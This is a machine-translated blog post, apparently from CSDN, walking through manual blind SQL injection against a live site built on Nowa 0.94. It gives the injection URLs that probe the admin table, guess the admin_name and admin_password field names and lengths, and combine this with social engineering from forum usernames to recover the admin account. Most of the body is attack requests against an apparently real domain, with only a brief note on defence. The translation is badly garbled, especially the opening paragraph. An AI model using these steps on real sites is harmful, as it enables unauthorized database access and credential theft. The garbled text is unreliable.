First, I complained about a strange city (Shanghai). It is easy to find a company to go to work, that is, the morning. In their company, I am responsible for security. Here, I am not every day in the detection of security, first the server, and then the whole site, haha, it is clear to remember that I went to work for eight days, during these eight days, I have carefully and seriously fixed the issue of not having any vulnerabilities, but I have come to the point where I am worried. I don't know whether it is my problem or other reasons. The company manager has asked me for help, I can't stay in the company because of my XXXX. unexpectedly, I went back to my friend's house that night and said that I did my company's security, I should know exactly what the problem is, but I did not do that. It is also strange that the server seems to have encountered a problem at which time, send an email to the good guys. There are still security problems! I have never complained about anyone today. I can only blame myself for being silly! To sum up, I am really stupid! I just want to say one thing here. Thank you for your book. I won't forget it, but I also want to give it to you in front of my colleagues across the Internet. Be honest!
Recently, more and more users are designing the entire site on the network. The entire site system is modified from Nowa 0.94! The Nowa-based system does not mean there are many other systems in the morning! I will not list them here. The core is the same, but the additional functions of the program are different! In terms of security, because of the Nowa-based system, the vulnerabilities currently known are only uploaded. In the following article, the SQL injection vulnerability that has never been found in Nowa system modification vulnerabilities! It's only strange that the injection problem was not completed when the program was modified in the morning! This cannot blame me! Who told programmers not to pay attention to security issues?
1. Determine the injection point
We will take the official website for testing, because we are worried that the version provided outside is not the latest version, which leads to a discrepancy in the correctness of the article. First, submit
Http: // ***. com/view. asp?
Action = Art & art_id = 70 and 1 = 1.
Enter again
Http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 201 = 2 Return
From the standard SQL injection point detection and1 = 1 and 1 = 2D information, we can see that there are SQL injection in the comments of this program for the two pictures respectively, because the modified versions based on Nowa are all based on the Access database architecture, we can further determine the database type of this program.
2. querying database tables
I am so lazy that I have to borrow nbsi for SQL injection. How can I know if it is because nbsi is so powerful that it cannot be used to kill chickens. It cannot detect all the SQL injection points I found! It was amazing. nbsi gave me a big face! So I had to stick my head to the manual injection. First, check whether the database table has an admin table. Construct statement submission
Http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 200 ????
(Select % 20 count (*) % 20 from % 20 admin)
The Database Administrator table in the current program is not the name of admin or adminuser user, so we only need to grasp the psychology of the program author to know, after the statement is submitted, the page returns normal, we can determine that the admin table exists in the database. We only need the admin password and account, so other tables in the database can be ignored.
3. Guess database fields
In order to reduce the trouble and unnecessary guesses, we should collect some information about the websites that have been infiltrated, for example, the Administrator's QQ and the Administrator's network names must be known, because we usually use a password and account that is easy to remember, so that we can not forget. The Edit document and administrator's QQ number cannot be found on functional pages such as the document page. I had to find the user name in BBS. Fortunately, we found the user name "Tian Chen" in BBS, in this way, you can try Chinese names or pinyin letters when you guess the admin account. (I used to show me plmm character and birthday in MSN. Pay attention to the importance of social engineering)
Let's take a look at the Administrator field of the program !? First, I guess the statement for name submission is as follows: http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 201 = (select % 20 count
(*) % 20 from % 20 admin % 20 where % 20len (name )?? 0)
(* _ * No! It is not the name field.) If the information returned after the statement is submitted is abnormal, it is confirmed that the field name is not in the admin table. It seems that I have to think about how to guess it. Since the name field is not enough, try the admin_name field! Re-construct the statement to guess the field:
Http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 201 =
(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20len
(Admin_name )?? 0)
(Can this be the case? I have taken another step !) After the statement is submitted, the page returns normal. Now the sub-statement is okay.
Then, we start to guess the password field. In fact, when we look at the echo above, we can say that the password field is admin_password, so the submitted statement is
Http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 201 =
(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20len
(Admin_password )?? 0)
The information is displayed normally, right !? Hahaha
Speaking of this, the entire guess is almost done! (What? Is there an account and password? Are you stupid ?) It is even more troublesome and time-consuming to guess the password and account! Let's take a look at the account and password guesses? First, let's guess the length of the account! Assume that we have previously obtained the Common Account Name "tianchun" as the administrator account. There are two possibilities. One is tianchen or tinzn, and the other is converting the Chinese character of tianchen into ASCII code for guessing. First, let's try the possibility of Pinyin. If so, we need to construct the length of admin_name to 5, so the submit Statement is http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 201 =
(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20len
(Admin_name )?? 5) The page information cannot be displayed normally. Then submit
Http://fj126.com/view.asp?
Action = Art & art_id = 70% 20and % 201
= (Select % 20 count (*) % 20 from % 20 admin % 20 where % 20len
(Admin_name )?? 4) This subpage is normal! Then, submit the statement
Http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 201 =
(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20len
(Admin_name) = 5)
We can determine that the length of admin_name is 5. The length of the account is reached, but we do not know the length of the password. According to information collection, we know that the password is encrypted using MD5 16 bits. So we can guess that the password length is 16 bits! Submit the statement http: // ***. com/view. asp?
Action = Art & art_id = 70% 20and % 201 =
(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20len
(Admin_password) = 16)
Not here! We can basically understand it! The account length is 5 Characters and the password length is 16 characters. As for the number of accounts and passwords, I will not list them any more! The Administrator account obtained after the test of the social engineering project is: tinzn is correct! The password is indeed md516-bit encryption. Throughout the process, you can use the CSC for injection testing!
Iv. Summary
There are several SQL Injection pages of the entire program, which are caused by the lack of related SQL Injection on the functional pages added by the entire site in the morning. If you are using this program, you can use a general script to prevent injection. Although MD5 requires brute-force cracking, if you really offend people, do not crack it. Maybe your website will be done by others, and network security is a very important part. I hope you will not underestimate the security aspect! If you have any errors in the above articles, please point out that if you have any questions, please contact me via your blog or email!
This article from the csdn blog, reproduced please indicate the source: http://blog.csdn.net/wufeng4552/archive/2008/12/05/3449988.aspx